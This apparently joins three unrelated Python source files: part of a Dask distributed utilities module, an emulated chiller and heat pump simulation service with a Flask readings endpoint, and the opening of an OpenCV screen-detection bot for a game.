assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with suppress(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
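# Editorial usage sketch (not part of the library): LoopRunner.run_sync() starts
# a background IO loop if needed, runs the coroutine on it, and stops the loop
# again, returning the coroutine's result to the calling thread.
def _loop_runner_usage_sketch():
    async def answer():
        return 42

    runner = LoopRunner()
    assert runner.run_sync(answer) == 42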
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
"""Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
@functools.lru_cache(100000)
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return key_split(x)
elif typ is bytes:
return key_split_group(x.decode())
else:
return key_split(x)
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Change all StreamHandlers for the given logger to the given level
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
"""Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
"""Truncate exception to be about a certain length"""
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
def validate_key(k):
"""Validate a key as received on a stream."""
typ = type(k)
if typ is not str and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)" % (typ, k))
def _maybe_complex(task):
"""Possibly contains a nested task"""
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def seek_delimiter(file, delimiter, blocksize):
"""Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
def read_block(f, offset, length, delimiter=None):
"""Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2 ** 16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2 ** 16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=""):
extension = "." + extension.lstrip(".")
handle, filename = tempfile.mkstemp(extension)
os.close(handle)
os.remove(filename)
yield filename
if os.path.exists(filename):
try:
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
except OSError: # sometimes we can't remove a generated temp file
pass
def ensure_bytes(s):
"""Attempt to turn `s` into bytes.
Parameters
----------
s : Any
        The object to be converted. The following types are handled correctly:
* str
* bytes
* objects implementing the buffer protocol (memoryview, ndarray, etc.)
Returns
-------
b : bytes
Raises
------
TypeError
When `s` cannot be converted
Examples
--------
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
elif hasattr(s, "encode"):
return s.encode()
else:
try:
return bytes(s)
except Exception as e:
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s
) from e
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
def open_port(host=""):
"""Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
"""Loads modules for a file (.py, .zip, .egg)"""
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with suppress(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
names_to_import.extend(names)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
importlib.invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(importlib.reload(importlib.import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
class itemgetter:
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ("index",)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
"""Number of bytes of a frame or memoryview"""
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def is_writeable(frame):
"""
Check whether frame is writeable
Will return ``True`` if writeable, ``False`` if readonly, and
``None`` if undetermined.
"""
try:
return not memoryview(frame).readonly
except TypeError:
return None
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print("TIME WARNING", text, end - start)
def deprecated(*, version_removed: str = None):
"""Decorator to mark a function as deprecated
Parameters
----------
version_removed : str, optional
If specified, include the version in which the deprecated function
will be removed. Defaults to "a future release".
"""
def decorator(func):
nonlocal version_removed
msg = f"{funcname(func)} is deprecated and will be removed in"
if version_removed is not None:
msg += f" version {version_removed}"
else:
msg += " a future release"
@functools.wraps(func)
def wrapper(*args, **kwargs):
warnings.warn(msg, DeprecationWarning, stacklevel=2)
return func(*args, **kwargs)
return wrapper
return decorator
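# Editorial usage sketch (not part of the library): calls to a decorated
# function still work but emit a DeprecationWarning pointing at the caller.
def _deprecated_usage_sketch():
    @deprecated(version_removed="9.99.0")
    def old_api(x):
        return x * 2

    with warnings.catch_warnings(record=True) as caught:
        warnings.simplefilter("always")
        assert old_api(3) == 6
    assert any(issubclass(w.category, DeprecationWarning) for w in caught)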
def json_load_robust(fn, load=json.load):
"""Reads a JSON file from disk that may be being written as we read"""
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
class DequeHandler(logging.Handler):
"""A logging.Handler that records records into a deque"""
_instances = weakref.WeakSet()
def __init__(self, *args, n=10000, **kwargs):
self.deque = deque(maxlen=n)
super().__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def reset_logger_locks():
"""Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
is_server_extension = False
if "notebook" in sys.modules:
import traitlets
from notebook.notebookapp import NotebookApp
is_server_extension = traitlets.config.Application.initialized() and isinstance(
traitlets.config.Application.instance(), NotebookApp
)
if not is_server_extension:
is_kernel_and_no_running_loop = False
if is_kernel():
try:
asyncio.get_running_loop()
except RuntimeError:
is_kernel_and_no_running_loop = True
if not is_kernel_and_no_running_loop:
# TODO: Use tornado's AnyThreadEventLoopPolicy, instead of class below,
# once tornado > 6.0.3 is available.
if WINDOWS and hasattr(asyncio, "WindowsSelectorEventLoopPolicy"):
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
# https://github.com/tornadoweb/tornado/issues/2608
BaseEventLoopPolicy = asyncio.WindowsSelectorEventLoopPolicy
else:
BaseEventLoopPolicy = asyncio.DefaultEventLoopPolicy
class AnyThreadEventLoopPolicy(BaseEventLoopPolicy):
def get_event_loop(self):
try:
return super().get_event_loop()
except (RuntimeError, AssertionError):
loop = self.new_event_loop()
self.set_event_loop(loop)
return loop
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
@functools.lru_cache(1000)
def has_keyword(func, keyword):
return keyword in inspect.signature(func).parameters
@functools.lru_cache(1000)
def command_has_keyword(cmd, k):
if cmd is not None:
if isinstance(cmd, str):
try:
from importlib import import_module
cmd = import_module(cmd)
except ImportError:
raise ImportError("Module for command %s is not available" % cmd)
if isinstance(getattr(cmd, "main"), click.core.Command):
cmd = cmd.main
if isinstance(cmd, click.core.Command):
cmd_params = set(
[
p.human_readable_name
for p in cmd.params
if isinstance(p, click.core.Option)
]
)
return k in cmd_params
return False
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
@functools.lru_cache(None)
def iscoroutinefunction(f):
return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f)
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
def typename(typ):
"""Return name of type
Examples
--------
>>> from distributed import Scheduler
>>> typename(Scheduler)
'distributed.scheduler.Scheduler'
"""
try:
return typ.__module__ + "." + typ.__name__
except AttributeError:
return str(typ)
def format_dashboard_link(host, port):
template = dask.config.get("distributed.dashboard.link")
if dask.config.get("distributed.scheduler.dashboard.tls.cert"):
scheme = "https"
else:
scheme = "http"
return template.format(
**toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
)
def parse_ports(port):
"""Parse input port information into list of ports
Parameters
----------
port : int, str, None
Input port or ports. Can be an integer like 8787, a string for a
single port like "8787", a string for a sequential range of ports like
"8000:8200", or None.
Returns
-------
ports : list
List of ports
Examples
--------
A single port can be specified using an integer:
>>> parse_ports(8787)
[8787]
or a string:
>>> parse_ports("8787")
[8787]
A sequential range of ports can be specified by a string which indicates
the first and last ports which should be included in the sequence of ports:
>>> parse_ports("8787:8790")
[8787, 8788, 8789, 8790]
An input of ``None`` is also valid and can be used to indicate that no port
has been specified:
>>> parse_ports(None)
[None]
"""
if isinstance(port, str) and ":" not in port:
port = int(port)
if isinstance(port, (int, type(None))):
ports = [port]
else:
port_start, port_stop = map(int, port.split(":"))
if port_stop <= port_start:
raise ValueError(
"When specifying a range of ports like port_start:port_stop, "
"port_stop must be greater than port_start, but got "
f"port_start={port_start} and port_stop={port_stop}"
)
ports = list(range(port_start, port_stop + 1))
return ports
is_coroutine_function = iscoroutinefunction
class Log(str):
"""A container for logs"""
def _repr_html_(self):
return "<pre><code>\n{log}\n</code></pre>".format(
log=html.escape(self.rstrip())
)
class Logs(dict):
"""A container for multiple logs"""
def _repr_html_(self):
summaries = [
"<details>\n"
"<summary style='display:list-item'>{title}</summary>\n"
"{log}\n"
"</details>".format(title=title, log=log._repr_html_())
for title, log in sorted(self.items())
]
return "\n".join(summaries)
def cli_keywords(d: dict, cls=None, cmd=None):
"""Convert a kwargs dictionary into a list of CLI keywords
Parameters
----------
d : dict
The keywords to convert
cls : callable
The callable that consumes these terms to check them for validity
cmd : string or object
A string with the name of a module, or the module containing a
click-generated command with a "main" function, or the function itself.
It may be used to parse a module's custom arguments (i.e., arguments that
are not part of Worker class), such as nprocs from dask-worker CLI or
enable_nvlink from dask-cuda-worker CLI.
Examples
--------
>>> cli_keywords({"x": 123, "save_file": "foo.txt"})
['--x', '123', '--save-file', 'foo.txt']
>>> from dask.distributed import Worker
>>> cli_keywords({"x": 123}, Worker)
Traceback (most recent call last):
...
ValueError: Class distributed.worker.Worker does not support keyword x
"""
if cls or cmd:
for k in d:
if not has_keyword(cls, k) and not command_has_keyword(cmd, k):
if cls and cmd:
raise ValueError(
"Neither class %s or module %s support keyword %s"
% (typename(cls), typename(cmd), k)
)
elif cls:
raise ValueError(
"Class %s does not support keyword %s" % (typename(cls), k)
)
else:
raise ValueError(
"Module %s does not support keyword %s" % (typename(cmd), k)
)
def convert_value(v):
out = str(v)
if " " in out and "'" not in out and '"' not in out:
out = '"' + out + '"'
return out
return sum(
[["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()], []
)
def is_valid_xml(text):
return xml.etree.ElementTree.fromstring(text) is not None
_offload_executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix="Dask-Offload")
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
"""Return the fully qualified term
Examples
--------
>>> import_term("math.sin") # doctest: +SKIP
<function math.sin(x, /)>
"""
try:
module_name, attr_name = name.rsplit(".", 1)
except ValueError:
return importlib.import_module(name)
module = importlib.import_module(module_name)
return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
loop = asyncio.get_event_loop()
return await loop.run_in_executor(_offload_executor, lambda: fn(*args, **kwargs))
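# Editorial usage sketch (not part of the library): offload() pushes a blocking
# call onto the single-threaded "Dask-Offload" executor so the event loop is not
# blocked while it runs.
def _offload_usage_sketch():
    async def main():
        return await offload(sum, [1, 2, 3])

    assert asyncio.get_event_loop().run_until_complete(main()) == 6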
class EmptyContext:
def __enter__(self):
pass
def __exit__(self, *args):
pass
async def __aenter__(self):
pass
async def __aexit__(self, *args):
pass
empty_context = EmptyContext()
class LRU(UserDict):
"""Limited size mapping, evicting the least recently looked-up key when full"""
def __init__(self, maxsize):
super().__init__()
self.data = OrderedDict()
self.maxsize = maxsize
def __getitem__(self, key):
value = super().__getitem__(key)
self.data.move_to_end(key)
return value
def __setitem__(self, key, value):
if len(self) >= self.maxsize:
self.data.popitem(last=False)
super().__setitem__(key, value)
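# Editorial usage sketch (not part of the library): with maxsize=2, inserting a
# third key evicts the least recently looked-up entry.
def _lru_usage_sketch():
    cache = LRU(maxsize=2)
    cache["a"] = 1
    cache["b"] = 2
    _ = cache["a"]   # touching "a" makes "b" the least recently used entry
    cache["c"] = 3   # evicts "b"
    assert "a" in cache and "c" in cache and "b" not in cache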
def clean_dashboard_address(addrs: Any, default_listen_ip: str = "") -> List[Dict]:
"""
Examples
--------
>>> clean_dashboard_address(8787)
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address(":8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("foo:8787")
[{'address': 'foo', 'port': 8787}]
>>> clean_dashboard_address([8787, 8887])
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
>>> clean_dashboard_address(":8787,:8887")
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
"""
if default_listen_ip == "0.0.0.0":
default_listen_ip = "" # for IPV6
if isinstance(addrs, str):
addrs = addrs.split(",")
if not isinstance(addrs, list):
addrs = [addrs]
addresses = []
for addr in addrs:
try:
addr = int(addr)
except (TypeError, ValueError):
pass
if isinstance(addr, str):
addr = addr.split(":")
if isinstance(addr, (tuple, list)):
if len(addr) == 2:
host, port = (addr[0], int(addr[1]))
elif len(addr) == 1:
[host], port = addr, 0
else:
raise ValueError(addr)
elif isinstance(addr, int):
host = default_listen_ip
port = addr
addresses.append({"address": host, "port": port})
return addresses
|
emulated_chiller_heatpump.py
|
from pyfmi import load_fmu
import yaml
import numpy as np
import asyncio
from flask import Flask, jsonify
import threading
from flexlab.db_layer import db_interface
import datetime
import pytz
import pandas as pd
class Emulated_Chiller_Heatpump:
def __init__(self, config_file='flexlab/models/chiller_heatpump_fmu_1b/chiller_config.yaml'):
with open(config_file) as fp:
self.config = yaml.safe_load(fp)
self._default_setpoint = self.config.get('default_setpoint', 44)
# min setpoint: 2C or 35.6F
self._min_setpoint = self.config.get('min_setpoint', 35.6)
self._max_setpoint = self.config.get('max_setpoint')
self.fmu_file = self.config.get('fmu_file')
self.chiller = load_fmu(self.fmu_file)
self.setpoint_table = self.config.get('setpoint_table')
self.cell = self.config.get('cell')
self.model_options = self.chiller.simulate_options()
self.model_options['initialize'] = True
self._model_update_rate = self.config.get('model_update_rate', 30)
self.model_options['CVode_options']['rtol'] = 1e-6
self.model_options['CVode_options']['atol'] = 1e-8
self.chiller_db = db_interface.DB_Interface()
self.current_time = 0
self.initialize_chiller_model()
self.app = Flask('emulated_chiller')
self.app.add_url_rule('/get_data', 'get_data', self.get_readings)
self.web_api_port = self.config.get('web_api_port', 5003)
self.loop = asyncio.get_event_loop()
self.schedule_tasks()
def initialize_chiller_model(self):
end_t = datetime.datetime.now(pytz.timezone('US/Pacific'))
start_t = end_t - datetime.timedelta(minutes=5)
chiller_values = self.chiller_db.get_latest_chiller_points(st = start_t, et = end_t, cell=self.cell).to_dict('records')[0]
chiller_values_SI_units = self.convert_units(chiller_values)
inputs = (
['m_flow_sec', 'T_chw_in', 'chiOn', 'T_air_in'],
np.array(
[[0, chiller_values_SI_units.get('m_flow_sec'), chiller_values_SI_units.get('T_chw_in'), chiller_values_SI_units.get('chiOn'), chiller_values_SI_units.get('T_air_in')],
[30, chiller_values_SI_units.get('m_flow_sec'), chiller_values_SI_units.get('T_chw_in'), chiller_values_SI_units.get('chiOn'), chiller_values_SI_units.get('T_air_in')]]
)
)
self.chiller.simulate(0, 30, inputs, options=self.model_options)
self.model_options['initialize'] = False
self.current_time = 30
def convert_units(self, chiller_values):
chiller_values_SI_units = {}
for key in chiller_values:
if key.endswith('-CHWFM-2'):
chiller_values_SI_units['m_flow_sec'] = chiller_values[key] * 0.000017 * 997
elif key.endswith('CHWRTS-2'):
chiller_values_SI_units['T_chw_in'] = chiller_values[key] + 273.15
elif key.endswith('CHWP-VFD-STAT'):
chiller_values_SI_units['chiOn'] = int(chiller_values[key]) == 1
elif key.endswith('OAT-1'):
chiller_values_SI_units['T_air_in'] = chiller_values[key] + 273.15
return chiller_values_SI_units
def schedule_tasks(self):
self.loop.create_task(self._periodic_advance_time())
async def _periodic_advance_time(self):
while True:
print("current time == {}".format(self.current_time))
start = self.current_time
end = self.current_time + self._model_update_rate
end_t = datetime.datetime.now(pytz.timezone('US/Pacific'))
start_t = end_t - datetime.timedelta(minutes=5)
chiller_values = self.chiller_db.get_latest_chiller_points(st=start_t, et=end_t, cell=self.cell).to_dict('records')[0]
chiller_values_SI_units = self.convert_units(chiller_values)
if chiller_values_SI_units.get('m_flow_sec') < 0:
chiller_values_SI_units['m_flow_sec'] = 0
inputs = (
['m_flow_sec', 'T_chw_in', 'chiOn', 'T_air_in'],
np.array(
[[start, chiller_values_SI_units.get('m_flow_sec'), chiller_values_SI_units.get('T_chw_in'), chiller_values_SI_units.get('chiOn'), chiller_values_SI_units.get('T_air_in')],
[end, chiller_values_SI_units.get('m_flow_sec'), chiller_values_SI_units.get('T_chw_in'), chiller_values_SI_units.get('chiOn'), chiller_values_SI_units.get('T_air_in')]]
)
)
self.chiller.simulate(start, end, inputs, options=self.model_options)
latest_chiller_setpoint = self.chiller.get('T_chw_out')[0]
if chiller_values_SI_units['m_flow_sec'] >= 0.005:
self.push_setpoint_to_db(latest_chiller_setpoint)
self.current_time = self.current_time + self._model_update_rate
await asyncio.sleep(self._model_update_rate)
def push_setpoint_to_db(self, setpoint):
variable_name = self.cell + '_chiller_heatpump_primary_sp_K_command'
action_dict = {variable_name: setpoint}
action_df = pd.DataFrame.from_records(action_dict, index=[0])
self.chiller_db.push_setpoints_to_db(cell=self.cell, df=action_df, table=self.setpoint_table)
def get_readings(self):
measurements = {
self.cell+'_m_flow_sec': self.chiller.get('m_flow_sec')[0],
self.cell+'_T_chw_in': self.chiller.get('T_chw_in')[0],
self.cell+'_chiOn': bool(self.chiller.get('chiOn')[0]),
self.cell+'_T_air_in': self.chiller.get('T_air_in')[0],
self.cell+'_T_chw_out': self.chiller.get('T_chw_out')[0],
self.cell+'_T_pch_in': self.chiller.get('T_pch_in')[0],
self.cell+'_chi_P': self.chiller.get('chi_P')[0],
self.cell+'_pum_P': self.chiller.get('pum_P')[0],
self.cell+'_m_flow_pri': self.chiller.get('m_flow_pri')[0],
self.cell+'_chi_spd': self.chiller.get('chi_spd')[0],
self.cell+'_chi_COP': self.chiller.get('chi_COP')[0]
}
print(measurements)
return jsonify(measurements)
def run(self):
self.app.run('0.0.0.0', port=self.web_api_port)
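# Editorial usage sketch (not part of this module): a client could poll the
# Flask endpoint exposed by Emulated_Chiller_Heatpump.get_readings(). Assumes
# the `requests` package is installed and the default web_api_port of 5003.
def _example_poll_readings():
    import requests
    return requests.get('http://localhost:5003/get_data').json()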
def main():
try:
loop = asyncio.get_event_loop()
chiller = Emulated_Chiller_Heatpump()
threading.Thread(target=chiller.run).start()
loop.run_forever()
except KeyboardInterrupt:
print('Stopping event loop')
loop.stop()
if __name__ == "__main__":
main()
|
main.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import threading
import os
import time
from timeit import default_timer as timer
# pip install opencv-python
import cv2
import numpy as np
import pyautogui
import keyboard
from common import get_logger, get_current_datetime_str, find_rect_contours
def filter_button(rect):
x, y, w, h = rect
    # TODO: comparing as a percentage of the screen size would scale better across resolutions than raw pixel thresholds
rule_1 = w > 30 and h > 30
rule_2 = w > h
    # Buttons are wider than they are tall
return rule_1 and rule_2
def filter_fairy(rect):
x, y, w, h = rect
    # TODO: comparing as a percentage of the screen size would scale better across resolutions than raw pixel thresholds
    # The fairy's width and height both exceed a certain threshold
    rule_1 = w > 20 and h > 20
    # The fairy is taller than it is wide
    rule_2 = h > w
    # The fairy flies roughly around the vertical middle of the screen
    rule_3 = y > 300 and y < 900
return rule_1 and rule_2 and rule_3
def filter_fairy_and_button(rect_fairy, rect_button):
x, y = rect_fairy[:2]
x2, y2, _, h2 = rect_button
    # TODO: comparing as a percentage of the screen size would scale better across resolutions than raw pixel thresholds
return abs(x2 - x) <= 50 and abs(y2 + h2 - y) <= 50
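# Editorial sketch of what a helper like `find_rect_contours` (imported from
# `common`) plausibly does: threshold the HSV image to a colour range and return
# the bounding rectangles (x, y, w, h) of the resulting contours. This is an
# assumption for illustration only; the real implementation lives in common.py.
def _find_rect_contours_sketch(img_hsv, hsv_min, hsv_max):
    mask = cv2.inRange(img_hsv, np.array(hsv_min), np.array(hsv_max))
    # OpenCV >= 4 signature: findContours returns (contours, hierarchy)
    contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    return [cv2.boundingRect(c) for c in contours]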
def save_screenshot(prefix, img_hsv):
file_name = DIR + '/{}__{}.png'.format(prefix, get_current_datetime_str())
log.debug(file_name)
cv2.imwrite(file_name, cv2.cvtColor(np.array(img_hsv), cv2.COLOR_HSV2BGR))
log = get_logger('Bot Buff Knight Advanced')
DIR = 'saved_screenshots'
if not os.path.exists(DIR):
os.mkdir(DIR)
BLUE_HSV_MIN = 105, 175, 182
BLUE_HSV_MAX = 121, 255, 255
ORANGE_HSV_MIN = 7, 200, 200
